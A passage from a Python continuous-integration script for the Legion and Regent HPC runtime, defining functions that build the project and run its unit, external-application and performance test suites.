os.path.basename(test_file), ')', '-exec', 'rm', '-v', '{}', ';'])\n\ndef run_regent(tests, flags, launcher, root_dir, env, thread_count, timelimit):\n for test_file, test_flags in tests:\n test_dir = os.path.dirname(os.path.join(root_dir, test_file))\n test_path = os.path.join(root_dir, test_file)\n cmd(launcher + [test_path] + flags + test_flags, env=env, cwd=test_dir, timelimit=timelimit)\n\ndef precompile_regent(tests, flags, launcher, root_dir, env, thread_count):\n exe_tests = []\n for test_file, test_flags in tests:\n test_dir = os.path.dirname(os.path.join(root_dir, test_file))\n test_path = os.path.join(root_dir, test_file)\n\n exe = os.path.splitext(test_path)[0] + '.exe'\n env = dict(list(env.items()) + [('OBJNAME', exe)])\n\n cmd(launcher + [test_path] + flags + test_flags, env=env, cwd=test_dir)\n\n exe_tests.append([exe, test_flags])\n return exe_tests\n\ndef run_test_legion_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-logfile', 'out_%.log']\n if env['USE_CUDA'] == '1' or env['USE_HIP'] == '1':\n flags.extend(['-ll:gpu', '1'])\n if (env['USE_KOKKOS'] == '1') and (env['USE_OPENMP'] == '1'):\n flags.extend(['-ll:ocpu', '1', '-ll:onuma', '0' ])\n run_cxx(legion_cxx_tests, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit)\n\ndef run_test_legion_network_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-logfile', 'out_%.log']\n if env['USE_CUDA'] == '1' or env['USE_HIP'] == '1':\n flags.extend(['-ll:gpu', '1'])\n if (env['USE_KOKKOS'] == '1') and (env['USE_OPENMP'] == '1'):\n flags.extend(['-ll:ocpu', '1', '-ll:onuma', '0' ])\n run_cxx(legion_network_cxx_tests, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit)\n\ndef run_test_legion_openmp_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-logfile', 'out_%.log']\n if env['USE_CUDA'] == '1' or env['USE_HIP'] == '1':\n flags.extend(['-ll:gpu', '1'])\n if (env['USE_KOKKOS'] == '1') and (env['USE_OPENMP'] == '1'):\n flags.extend(['-ll:ocpu', '1', '-ll:onuma', '0' ])\n run_cxx(legion_openmp_cxx_tests, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit)\n\ndef run_test_legion_kokkos_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-logfile', 'out_%.log']\n if env['USE_CUDA'] == '1' or env['USE_HIP'] == '1':\n flags.extend(['-ll:gpu', '1'])\n if (env['USE_KOKKOS'] == '1') and (env['USE_OPENMP'] == '1'):\n flags.extend(['-ll:ocpu', '1', '-ll:onuma', '0' ])\n run_cxx(legion_kokkos_cxx_tests, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit)\n\ndef run_test_legion_python_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n # Hack: legion_python currently requires the module name to come first\n flags = [] # ['-logfile', 'out_%.log']\n python_dir = os.path.join(root_dir, 'bindings', 'python')\n # Hack: Fix up the environment so that Python can find all the examples.\n env = dict(list(env.items()) + [\n ('PYTHONPATH', ':'.join([python_dir])),\n ('LD_LIBRARY_PATH', ':'.join([python_dir])),\n ])\n # Clean up around python because we are going to make shared objects\n # which is not something that anyone else does\n cmd([make_exe, '-C', python_dir, 'clean'], env=env)\n run_cxx(legion_python_cxx_tests, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit)\n cmd([make_exe, '-C', python_dir, 'clean'], env=env)\n\ndef run_test_legion_jupyter_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n # Hack: legion_python currently requires the module name to come first\n flags = [] # ['-logfile', 'out_%.log']\n python_dir = os.path.join(root_dir, 'bindings', 'python')\n # Hack: Fix up the environment so that Python can find all the examples.\n env = dict(list(env.items()) + [\n ('PYTHONPATH', ':'.join([python_dir])),\n ('LD_LIBRARY_PATH', ':'.join([python_dir])),\n ])\n # Clean up around python because we are going to make shared objects\n # which is not something that anyone else does\n cmd([make_exe, '-C', python_dir, 'clean'], env=env)\n cmd([make_exe, '-C', python_dir, '-j', str(thread_count)], env=env)\n jupyter_dir = os.path.join(root_dir, 'jupyter_notebook')\n jupyter_install_cmd = [sys.executable, './install_jupyter.py', '--legion-prefix', python_dir, '--verbose']\n cmd(jupyter_install_cmd, env=env, cwd=jupyter_dir)\n jupyter_test_file = os.path.join(root_dir, 'jupyter_notebook', 'ci_test.py')\n jupyter_test_cmd = ['jupyter', 'run', '--kernel', 'legion_kernel_nocr', jupyter_test_file]\n cmd(jupyter_test_cmd, env=env)\n canonical_jupyter_test_file = os.path.join(root_dir, 'jupyter_notebook', 'test_canonical.py')\n canonical_jupyter_test_cmd = ['jupyter', 'run', '--kernel', 'python3', canonical_jupyter_test_file]\n cmd(canonical_jupyter_test_cmd, env=env)\n canonical_python_test_cmd = [sys.executable, canonical_jupyter_test_file]\n cmd(canonical_python_test_cmd, env=env)\n cmd([make_exe, '-C', python_dir, 'clean'], env=env)\n\ndef run_test_legion_prof_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-lg:prof','1', '-lg:prof_logfile', 'prof_%.gz']\n from tools.test_prof import run_prof_test\n for test_file, test_flags in legion_cxx_prof_tests:\n prof_test = [[test_file, test_flags],]\n run_cxx(prof_test, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit)\n test_file_path = Path(os.path.join(root_dir, test_file))\n test_dir = test_file_path.parent.absolute()\n run_prof_test(root_dir, test_dir, tmp_dir)\n\ndef run_test_legion_hdf_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-logfile', 'out_%.log']\n if env['USE_CUDA'] == '1' or env['USE_HIP'] == '1':\n flags.extend(['-ll:gpu', '1'])\n if (env['USE_KOKKOS'] == '1') and (env['USE_OPENMP'] == '1'):\n flags.extend(['-ll:ocpu', '1', '-ll:onuma', '0' ])\n run_cxx(legion_hdf_cxx_tests, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit)\n\ndef run_test_legion_fortran(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-logfile', 'out_%.log']\n if env['USE_CUDA'] == '1' or env['USE_HIP'] == '1':\n flags.extend(['-ll:gpu', '1'])\n run_cxx(legion_fortran_tests, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit)\n\ndef run_test_fuzzer(launcher, root_dir, tmp_dir, bin_dir, env, thread_count):\n env = dict(list(env.items()) + [('WARN_AS_ERROR', '0')])\n fuzz_dir = os.path.join(tmp_dir, 'fuzz-tester')\n cmd(['git', 'clone', 'https://github.com/StanfordLegion/fuzz-tester', fuzz_dir])\n # TODO; Merge deppart branch into master after this makes it to stable Legion branch\n cmd(['git', 'checkout', 'deppart'], cwd=fuzz_dir)\n cmd(['python3', 'main.py'], env=env, cwd=fuzz_dir)\n\ndef run_test_realm(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n test_dir = os.path.join(root_dir, 'test/realm')\n cmd([make_exe, '-C', test_dir, 'DEBUG=0', 'clean'], env=env)\n cmd([make_exe, '-C', test_dir, 'DEBUG=0', '-j', str(thread_count), 'build'], env=env)\n cmd([make_exe, '-C', test_dir, 'DEBUG=0', 'run_all'], env=env, timelimit=timelimit)\n\ndef run_test_external1(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-logfile', 'out_%.log']\n\n # Realm perf test (move back to perf test when integrated with perf.py)\n perf_dir = os.path.join(root_dir, 'test/performance/realm')\n cmd([make_exe, '-C', perf_dir, 'DEBUG=0', 'clean_all'], env=env)\n cmd([make_exe, '-C', perf_dir, 'DEBUG=0', 'build_all'], env=env)\n cmd([make_exe, '-C', perf_dir, 'DEBUG=0', 'RUNMODE=short', 'run_all'], env=env, timelimit=timelimit)\n\n # Fast Direct Solver\n # Contact: Chao Chen \n solver_dir = os.path.join(tmp_dir, 'fastSolver2')\n cmd(['git', 'clone', 'https://github.com/Charles-Chao-Chen/fastSolver2.git', solver_dir])\n # cmd(['git', 'checkout', '4c7a59de63dd46a0abcc7f296fa3b0f511e5e6d2', ], cwd=solver_dir)\n solver = [[os.path.join(solver_dir, 'spmd_driver/solver'),\n ['-machine', '1', '-core', '8', '-mtxlvl', '6', '-ll:cpu', '8', '-ll:csize', '1024']]]\n run_cxx(solver, flags, launcher, root_dir, None, env, thread_count, timelimit)\n\n # Parallel Research Kernels: Stencil\n # Contact: Wonchan Lee \n prk_dir = os.path.join(tmp_dir, 'prk')\n cmd(['git', 'clone', 'https://github.com/magnatelee/PRK.git', prk_dir])\n # This uses a custom Makefile that requires additional\n # configuration. Rather than go to that trouble it's easier to\n # just use a copy of the standard Makefile template.\n stencil_dir = os.path.join(prk_dir, 'LEGION', 'Stencil')\n stencil_env = dict(list(env.items()) + [\n ('OUTFILE', 'stencil'),\n ('GEN_SRC', 'stencil.cc'),\n ('CXXFLAGS', (env['CXXFLAGS'] if 'CXXFLAGS' in env else '') +\n ' -DRADIUS=2 -DRESTRICT_KEYWORD -DDISABLE_BARRIER_MIGRATION'),\n ])\n makefile = os.path.join(root_dir, 'apps/Makefile.template')\n cmd([make_exe, '-f', makefile, '-C', stencil_dir, '-j', str(thread_count)], env=stencil_env)\n stencil = os.path.join(stencil_dir, 'stencil')\n # HACK: work around stencil mapper issue with -ll:ext_sysmem 0\n cmd([stencil, '4', '10', '1000', '-ll:ext_sysmem', '0'], timelimit=timelimit)\n\n # SNAP\n # Contact: Mike Bauer \n snap_dir = os.path.join(tmp_dir, 'snap')\n cmd(['git', 'clone', 'https://github.com/StanfordLegion/Legion-SNAP.git', snap_dir])\n # This can't handle flags before application arguments, so place\n # them after.\n snap = [[os.path.join(snap_dir, 'src/snap'),\n [os.path.join(snap_dir, 'input/mms.in')] + flags]]\n run_cxx(snap, [], launcher, root_dir, None, env, thread_count, timelimit)\n\n # Soleil-X\n # Contact: Manolis Papadakis \n soleil_dir = os.path.join(tmp_dir, 'soleil-x')\n cmd(['git', 'clone', 'https://github.com/stanfordhpccenter/soleil-x.git', soleil_dir])\n soleil_env = dict(list(env.items()) + [\n ('LEGION_DIR', root_dir),\n ('SOLEIL_DIR', soleil_dir),\n ('CC', 'gcc'),\n ])\n cmd([make_exe, '-C', os.path.join(soleil_dir, 'src')], env=soleil_env)\n # FIXME: Actually run it\n\ndef run_test_external2(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n # HTR\n # Contact: Mario Di Renzo \n htr_dir = os.path.join(tmp_dir, 'htr')\n # cmd(['git', 'clone', 'https://github.com/stanfordhpccenter/HTR-solver.git', htr_dir])\n # NOTE: the legion-ci branch currently requires g++ (not clang) to build and\n # is REALLY slow unless you set DEBUG=0\n cmd(['git', 'clone', '-b', 'legion-ci', 'git@gitlab.com:mario.direnzo/Prometeo.git', htr_dir])\n htr_env = dict(list(env.items()) + [\n ('LEGION_DIR', root_dir),\n ('LD_LIBRARY_PATH', os.path.join(root_dir, 'bindings', 'regent')),\n ('HTR_DIR', htr_dir),\n ('CC', 'gcc'),\n ('CXX', 'g++'),\n ('DEBUG', '0'),\n ])\n cmd(['python3', os.path.join(htr_dir, 'unitTests', 'testAll.py')], env=htr_env)\n\n # TaskAMR\n # Contact: Jonathan Graham \n task_amr_dir = os.path.join(tmp_dir, 'task_amr')\n cmd(['git', 'clone', 'https://github.com/lanl/TaskAMR.git', task_amr_dir])\n task_amr_env = dict(list(env.items()) + [\n ('LEGION_ROOT', root_dir),\n ])\n cmd([make_exe, '-C', os.path.join(task_amr_dir)], env=task_amr_env)\n\n # Barnes-Hut\n # Contact: Haithem Turki \n barnes_hut_dir = os.path.join(tmp_dir, 'barnes_hut')\n cmd(['git', 'clone', 'https://github.com/StanfordLegion/barnes-hut.git', barnes_hut_dir])\n regent_path = os.path.join(root_dir, 'language', 'regent.py')\n cmd([sys.executable, regent_path, 'hdf5_converter.rg',\n '-i', 'input/bodies-16384-blitz.csv',\n '-o', 'bodies-16384-blitz.h5',\n '-n', '16384'],\n cwd=barnes_hut_dir,\n env=env,\n timelimit=timelimit)\n # work around search path that doesn't include bindings/regent\n for hdr in ('legion_defines.h', 'realm_defines.h'):\n os.symlink(os.path.join(root_dir, 'bindings', 'regent', hdr),\n os.path.join(root_dir, 'runtime', hdr))\n cmd([sys.executable, regent_path, 'barnes_hut.rg',\n '-i', 'bodies-16384-blitz.h5',\n '-n', '16384'],\n cwd=barnes_hut_dir,\n env=env,\n timelimit=timelimit)\n\ndef run_test_private(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-logfile', 'out_%.log']\n\n # MiniAero\n # Contact: Wonchan Lee \n miniaero_dir = os.path.join(tmp_dir, 'miniaero-spmd')\n cmd(['git', 'clone', '-b', 'spmd_flattened_superblocks',\n 'git@github.com:magnatelee/miniaero-spmd.git', miniaero_dir])\n cmd([make_exe, '-C', miniaero_dir, '-j', str(thread_count)], env=env,\n cwd=miniaero_dir)\n for test in ['3D_Sod', '3D_Sod_2nd_Order'\n # These tests take a long time so skip them by default.\n # , 'FlatPlate', 'Ramp'\n ]:\n test_dir = os.path.join(miniaero_dir, 'tests', test)\n cmd([os.path.join(test_dir, 'test.sh')], env=env, cwd=test_dir, timelimit=timelimit)\n\n # PENNANT\n # Contact: Galen Shipman \n pennant_dir = os.path.join(tmp_dir, 'pennant')\n cmd(['git', 'clone', '-b', 'spmdv2',\n 'git@github.com:gshipman/pennant-legion.git', pennant_dir])\n # This uses a custom Makefile that requires additional\n # configuration. Rather than go to that trouble it's easier to\n # just use a copy of the standard Makefile template.\n pennant_env = dict(list(env.items()) + [\n ('OUTFILE', 'pennant'),\n ('GEN_SRC', ' '.join(glob.glob(os.path.join(pennant_dir, 'src/*.cc')))),\n ('CXXFLAGS', (env['CXXFLAGS'] if 'CXXFLAGS' in env else '') +\n ' -std=c++11 -Wno-sign-compare -Wno-unknown-pragmas -Wno-unused-variable' +\n ' -D__STDC_FORMAT_MACROS -DDISABLE_BARRIER_MIGRATION'),\n ('WARN_AS_ERROR', '0'),\n ])\n makefile = os.path.join(root_dir, 'apps/Makefile.template')\n # Previous build uses -DASSUME_UNALLOCABLE. Clean first to get a fresh environment.\n cmd([make_exe, '-f', makefile, '-C', pennant_dir, 'clean'], env=pennant_env)\n cmd([make_exe, '-f', makefile, '-C', pennant_dir, '-j', str(thread_count)], env=pennant_env)\n pennant = os.path.join(pennant_dir, 'pennant')\n cmd([pennant, str(app_cores), 'test/sedovsmall/sedovsmall.pnt', '-ll:cpu', str(app_cores)],\n cwd=pennant_dir,\n timelimit=timelimit)\n\n\ndef run_test_ctest(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n build_dir = os.path.join(tmp_dir, 'build')\n args = ['ctest', '--output-on-failure']\n # do not run tests in parallel if they use GPUs - might not all fit\n if env['USE_CUDA'] != '1' and env['USE_HIP'] != '1':\n args.extend(['-j', str(thread_count)])\n if timelimit:\n args.extend(['--timeout', str(timelimit)])\n cmd(args,\n env=env,\n cwd=build_dir)\n\ndef run_test_legion_prof_mypy(root_dir):\n mypy_cmd = [\n \"mypy\",\n \"--disallow-any-unimported\",\n \"--disallow-any-explicit\",\n \"--disallow-untyped-defs\",\n \"--disallow-incomplete-defs\",\n \"--warn-redundant-casts\",\n \"--warn-unused-ignores\",\n os.path.join(root_dir, 'tools', 'legion_prof.py'),\n ]\n print('Running mypy test:', cmd)\n cmd(mypy_cmd)\n\ndef hostname():\n return subprocess.check_output(['hostname']).strip()\n\ndef git_commit_id(repo_dir):\n return subprocess.check_output(\n ['git', 'rev-parse', 'HEAD'], cwd=repo_dir).strip()\n\ndef git_branch_name(repo_dir):\n proc = subprocess.Popen(\n ['git', 'symbolic-ref', '--short', 'HEAD'], cwd=repo_dir,\n stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n output, errors = proc.communicate()\n if proc.returncode == 0:\n return output.strip()\n return None\n\ndef run_test_perf_one_configuration(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, nodes, timelimit):\n flags = ['-logfile', 'out_%.log']\n\n # for backward-compatibility, use app_cores if PERF_CORES_PER_NODE is not specified\n cores_per_node = int(os.environ.get('PERF_CORES_PER_NODE', app_cores))\n\n legion_cxx_perf_tests = get_legion_cxx_perf_tests(nodes, cores_per_node)\n regent_perf_tests = get_regent_perf_tests(nodes, cores_per_node)\n\n # Regent needs special flags when in precompile mode\n precompile = os.environ.get('PERF_PRECOMPILE_REGENT') == '1'\n\n # Performance test configuration:\n metadata = {\n 'host': (os.environ['CI_RUNNER_DESCRIPTION']\n if 'CI_RUNNER_DESCRIPTION' in os.environ else hostname()),\n 'nodes': nodes,\n 'commit': (os.environ['CI_BUILD_REF'] if 'CI_BUILD_REF' in os.environ\n else git_commit_id(root_dir)),\n 'branch': (os.environ['CI_BUILD_REF_NAME'] if 'CI_BUILD_REF_NAME' in os.environ\n else git_branch_name(root_dir)),\n }\n cxx_measurements = {\n # Hack: Use the command name as the benchmark name.\n 'benchmark': {\n 'type': 'argv',\n 'index': 0,\n 'filter': 'basename',\n },\n # Capture command line arguments following flags.\n 'argv': {\n 'type': 'argv',\n 'start': 1 + len(flags),\n },\n # Record running time in seconds.\n 'time_seconds': {\n 'type': 'regex',\n 'pattern': r'^ELAPSED TIME\\s*=\\s*(.*) s$',\n 'multiline': True,\n }\n }\n regent_measurements = {\n # Hack: Use the command name as the benchmark name.\n 'benchmark': {\n 'type': 'argv',\n 'index': 1,\n 'filter': 'basename',\n },\n # Capture command line arguments following flags.\n 'argv': {\n 'type': 'argv',\n 'start': 2,# + len(flags), # FIXME: Skipping flags, see below.\n },\n # Record running time in seconds.\n 'time_seconds': {\n 'type': 'command',\n 'args': [\n os.path.join(root_dir, 'language/scripts/summarize.py'),\n '--machine-readable', '-',\n ],\n }\n }\n env = dict(list(env.items()) + [\n ('PERF_OWNER', 'StanfordLegion'),\n ('PERF_REPOSITORY', 'perf-data'),\n ('PERF_METADATA', json.dumps(metadata)),\n ])\n cxx_env = dict(list(env.items()) + [\n ('PERF_MEASUREMENTS', json.dumps(cxx_measurements)),\n # Launch through perf.py\n ('PERF_LAUNCHER', ' '.join(launcher)),\n ('LAUNCHER', ''),\n ])\n regent_env = dict(list(env.items()) + [\n ('PERF_MEASUREMENTS', json.dumps(regent_measurements)),\n # Launch through regent.py\n ('PERF_LAUNCHER', ' '.join(launcher) if precompile else ''),\n ('LAUNCHER', '' if precompile else ' '.join(launcher)),\n ])\n\n # Build Regent first to avoid recompiling later.\n cmd([sys.executable, os.path.join(root_dir, 'language/travis.py'), '--install-only'], env=env)\n\n # Run Legion C++ performance tests.\n runner = os.path.join(root_dir, 'perf.py')\n run_cxx(legion_cxx_perf_tests, flags, [runner], root_dir, bin_dir, cxx_env, thread_count, timelimit)\n\n # Run Regent performance tests.\n regent_path = os.path.join(root_dir, 'language/regent.py')\n if precompile:\n # Precompile executables.\n build_env = dict(list(env.items()) + [\n ('SAVEOBJ', '1'),\n ('STANDALONE', '1'),\n ('LAUNCHER', ''),\n ])\n exe_tests = precompile_regent(regent_perf_tests, [], [regent_path], root_dir, build_env, thread_count)\n\n # FIXME: PENNANT can't handle the -logfile flag coming first, so just skip it.\n run_regent(exe_tests, [], [runner], root_dir, regent_env, thread_count)\n else:\n # FIXME: PENNANT can't handle the -logfile flag coming first, so just skip it.\n run_regent(regent_perf_tests, [], [runner, regent_path], root_dir, regent_env, thread_count)\n\n # Render the final charts.\n subprocess.check_call(\n [sys.executable,\n os.path.join(root_dir, 'tools', 'perf_chart.py'),\n 'git@github.com:StanfordLegion/perf-data.git',\n 'git@github.com:StanfordLegion/perf-data.git'],\n env=env)\n\ndef run_test_perf(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, min_nodes, max_nodes, timelimit):\n nodes = min_nodes\n while nodes <= max_nodes:\n launcher = [w.format(**{'NODES': nodes}) for w in launcher]\n run_test_perf_one_configuration(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, nodes, timelimit)\n nodes *= 2\n\ndef check_test_legion_cxx(root_dir):\n print('Checking that tests that SHOULD be tested are ACTUALLY tested...')\n print()\n\n # These are the directories we SHOULD have coverage for.\n should_dirs = ['tutorial', 'examples', 'test']\n should_tests = []\n for dir in should_dirs:\n entries = os.listdir(os.path.join(root_dir, dir))\n for entry in entries:\n if os.path.isdir(os.path.join(root_dir, dir, entry)):\n should_tests.append(os.path.join(dir, entry))\n assert len(should_tests) > 0\n\n # These are the tests we ACTUALLY have coverage for.\n tests = legion_cxx_tests + legion_network_cxx_tests + \\\n legion_openmp_cxx_tests + legion_python_cxx_tests + \\\n legion_hdf_cxx_tests + legion_kokkos_cxx_tests + \\\n legion_fortran_tests\n actual_tests = set()\n for test_file, test_flags in tests:\n actual_tests.add(os.path.dirname(test_file))\n\n actual_tests.add('test/realm') # We test Realm separately.\n actual_tests.add('test/performance') # We test performance separately.\n\n # Check that all tests that SHOULD be covered are ACTUALLY covered.\n not_tests = []\n for should_test in should_tests:\n if should_test not in actual_tests:\n not_tests.append(should_test)\n if len(not_tests) > 0:\n print('The following tests are NOT currently being tested:')\n print()\n for not_test in not_tests:\n print(' %s' % not_test)\n print()\n raise Exception('There are tests that are NOT in the test suite')\n\ndef build_cmake(root_dir, tmp_dir, env, thread_count,\n test_regent, test_legion_cxx,\n test_external1, test_external2, test_perf, test_ctest):\n build_dir = os.path.join(tmp_dir, 'build')\n install_dir = os.path.join(tmp_dir, 'install')\n os.mkdir(build_dir)\n os.mkdir(install_dir)\n cmdline = ['cmake', '-DCMAKE_INSTALL_PREFIX=%s' % install_dir ]\n cmdline.append('-DCMAKE_BUILD_TYPE=%s' % ('Debug' if env['DEBUG'] == '1' else\n 'Release'))\n cmdline.append('-DLegion_BUILD_WARN_AS_ERROR=%s' % ('ON' if env.get('WARN_AS_ERROR','0') == '1' else 'OFF'))\n cmdline.append('-DLegion_MAX_DIM=%s' % env['MAX_DIM'])\n cmdline.append('-DLegion_NETWORKS=%s' % env['REALM_NETWORKS'])\n if 'EMBED_GASNET' in env:\n cmdline.append('-DLegion_EMBED_GASNet=ON')\n cmdline.append('-DGASNet_CONDUIT=' + env['CONDUIT'])\n if 'EMBED_GASNET_SRC' in env:\n cmdline.append('-DLegion_EMBED_GASNet_LOCALSRC=' + env['EMBED_GASNET_SRC'])\n cmdline.append('-DLegion_USE_CUDA=%s' % ('ON' if env['USE_CUDA'] == '1' else 'OFF'))\n if 'GPU_ARCH' in env:\n cmdline.append('-DLegion_CUDA_ARCH=%s' % env['GPU_ARCH'])\n cmdline.append('-DLegion_USE_HIP=%s' % ('ON' if env['USE_HIP'] == '1' else 'OFF'))\n if 'HIP_ARCH' in env:\n cmdline.append('-DLegion_HIP_ARCH=%s' % env['HIP_ARCH'])\n if 'THRUST_PATH' in env and env['USE_COMPLEX'] == '1':\n cmdline.append('-DHIP_THRUST_ROOT_DIR=%s' % env['THRUST_PATH'])\n cmdline.append('-DLegion_USE_NVTX=%s' % ('ON' if env['USE_NVTX'] == '1' else 'OFF'))\n cmdline.append('-DLegion_USE_OpenMP=%s' % ('ON' if env['USE_OPENMP'] == '1' else 'OFF'))\n cmdline.append('-DLegion_USE_Kokkos=%s' % ('ON' if env['USE_KOKKOS'] == '1' else 'OFF'))\n cmdline.append('-DLegion_USE_Python=%s' % ('ON' if env['USE_PYTHON'] == '1' else 'OFF'))\n cmdline.append('-DLegion_USE_LLVM=%s' % ('ON' if env['USE_LLVM'] == '1' else 'OFF'))\n cmdline.append('-DLegion_USE_HDF5=%s' % ('ON' if env['USE_HDF'] == '1' else 'OFF'))\n cmdline.append('-DLegion_USE_Fortran=%s' % ('ON' if env['LEGION_USE_FORTRAN'] == '1' else 'OFF'))\n cmdline.append('-DLegion_SPY=%s' % ('ON' if env['USE_SPY'] == '1' else 'OFF'))\n cmdline.append('-DLegion_BOUNDS_CHECKS=%s' % ('ON' if env['BOUNDS_CHECKS'] == '1' else 'OFF'))\n cmdline.append('-DLegion_PRIVILEGE_CHECKS=%s' % ('ON' if env['PRIVILEGE_CHECKS'] == '1' else 'OFF'))\n cmdline.append('-DLegion_REDOP_COMPLEX=%s' % ('ON' if env['USE_COMPLEX'] == '1' else 'OFF'))\n cmdline.append('-DLegion_BACKTRACE_USE_LIBDW=%s' % ('ON' if env['REALM_BACKTRACE_USE_LIBDW'] == '1' else 'OFF'))\n if 'LEGION_WARNINGS_FATAL' in env:\n cmdline.append('-DLegion_WARNINGS_FATAL=%s' % ('ON' if env['LEGION_WARNINGS_FATAL'] == '1' else 'OFF'))\n if test_ctest:\n cmdline.append('-DLegion_ENABLE_TESTING=ON')\n if 'LAUNCHER' in env:\n cmdline.append('-DLegion_TEST_LAUNCHER=%s' % env['LAUNCHER'])\n if env['USE_CUDA'] == '1' or env['USE_HIP'] == '1':\n cmdline.append('-DLegion_TEST_ARGS=-ll:gpu 1 -ll:fsize 1024')\n else:\n cmdline.append('-DLegion_ENABLE_TESTING=OFF')\n if test_regent or (test_legion_cxx and (env['USE_PYTHON'] == '1')):\n cmdline.append('-DLegion_BUILD_BINDINGS=ON')\n if test_legion_cxx or test_ctest:\n cmdline.extend(['-DLegion_BUILD_APPS=ON',\n '-DLegion_BUILD_EXAMPLES=ON',\n '-DLegion_BUILD_TUTORIAL=ON',\n '-DLegion_BUILD_TESTS=ON',\n ])\n # several different conditions force the use of shared libraries\n if test_regent or test_external1 or test_external2 or (env['USE_PYTHON'] == '1') or (env['SHARED_OBJECTS'] == '1'):\n cmdline.append('-DBUILD_SHARED_LIBS=ON')\n else:\n cmdline.append('-DBUILD_SHARED_LIBS=OFF')\n # if MARCH is set in the environment, give that to cmake as BUILD_MARCH\n if 'MARCH' in env:\n cmdline.append('-DBUILD_MARCH=' + env['MARCH'])\n # add cxx standard\n if 'CXX_STANDARD' in env:\n cmdline.append('-DCMAKE_CXX_STANDARD=' + env['CXX_STANDARD'])\n # cmake before 3.16 doesn't know how to look for CUDAHOSTCXX\n if 'CUDAHOSTCXX' in env:\n cmdline.append('-DCMAKE_CUDA_HOST_COMPILER=' + env['CUDAHOSTCXX'])\n # add any extra cmake args requested in the environment\n if 'EXTRA_CMAKE_ARGS' in env:\n cmdline.extend(shlex.split(env['EXTRA_CMAKE_ARGS']))\n # last argument to cmake is the root of the tree\n cmdline.append(root_dir)\n\n cmd(cmdline, env=env, cwd=build_dir)\n verbose_env=env.copy()\n verbose_env['VERBOSE'] = '1'\n cmd([make_exe, '-C', build_dir, '-j', str(thread_count)], env=verbose_env)\n cmd([make_exe, '-C', build_dir, 'install'], env=env)\n return os.path.join(build_dir, 'bin')\n\ndef build_legion_prof_rs(root_dir, tmp_dir, env):\n legion_prof_dir = os.path.join(root_dir, 'tools', 'legion_prof_rs')\n cmd(['cargo', 'install',\n '--all-features',\n '--locked',\n '--debug', # Enables debug checks. Still optimizes like -O2.\n '--path', legion_prof_dir,\n '--root', tmp_dir],\n env=env)\n cmd(['cargo', 'test', '--all-features'], env=env, cwd=legion_prof_dir)\n cmd(['cargo', 'fmt', '--all', '--', '--check'], env=env, cwd=legion_prof_dir)\n\ndef build_regent(root_dir, env):\n cmd([os.path.join(root_dir, 'language/travis.py'), '--install-only'], env=env)\n\ndef clean_cxx(tests, root_dir, env, thread_count):\n env = dict(list(env.items()) + [\n ('MAKEFLAGS', 's'), # Always silence initial clean.\n ])\n for test_file, test_flags in tests:\n test_dir = os.path.dirname(os.path.join(root_dir, test_file))\n cmd([make_exe, '-C', test_dir, 'clean'], env=env)\n\ndef build_make_clean(root_dir, env, thread_count, test_legion_cxx, test_perf,\n test_external1, test_external2, test_private):\n # External and private also require cleaning, even though they get\n # built separately.\n if test_legion_cxx or test_perf or test_external1 or test_external2 or test_private:\n clean_cxx(legion_cxx_tests, root_dir, env, thread_count)\n if test_legion_cxx and env['LEGION_USE_FORTRAN'] == '1':\n clean_cxx(legion_fortran_tests, root_dir, env, thread_count)\n\ndef option_enabled(option, options, default, envprefix='', envname=None):\n if options is not None: return option in options\n if envname is not None:\n option_var = envname\n else:\n option_var = '%s%s' % (envprefix, option.upper())\n if option_var in os.environ: return os.environ[option_var] == '1'\n return default\n\nclass Stage(object):\n __slots__ = ['name', 'begin_time']\n def __init__(self, name):\n self.name = name\n def __enter__(self):\n self.begin_time = datetime.datetime.now()\n print()\n print('#'*60)\n print('### Entering Stage: %s' % self.name)\n print('#'*60)\n print()\n sys.stdout.flush()\n def __exit__(self, exc_type, exc_val, exc_tb):\n end_time = datetime.datetime.now()\n print()\n print('#'*60)\n print('### Exiting Stage: %s' % self.name)\n print('### * Exception Type: %s' % exc_type)\n print('### * Elapsed Time: %s' % (end_time - self.begin_time))\n print('#'*60)\n print()\n sys.stdout.flush()\n\ndef report_mode(debug, max_dim, launcher,\n test_regent, test_legion_cxx, test_fuzzer, test_realm,\n test_external1, test_external2, test_private,\n test_perf, test_ctest, test_jupyter, networks,\n use_cuda, use_hip, use_openmp, use_kokkos, use_python, use_llvm,\n use_hdf, use_fortran, use_spy, use_prof,\n use_bounds_checks, use_privilege_checks, use_complex,\n use_shared_objects,\n use_gcov, use_cmake, use_rdir, use_nvtx, use_libdw, cxx_standard):\n print()\n print('#'*60)\n print('### Test Suite Configuration')\n print('###')\n print('### Python:')\n print('\\n'.join(['### ' + line for line in sys.version.split('\\n')]))\n print('###')\n print('### Debug: %s' % debug)\n print('### Launcher: %s' % launcher)\n print('###')\n print('### Running Tests:')\n print('### * Regent: %s' % test_regent)\n print('### * Legion C++: %s' % test_legion_cxx)\n print('### * Fuzzer: 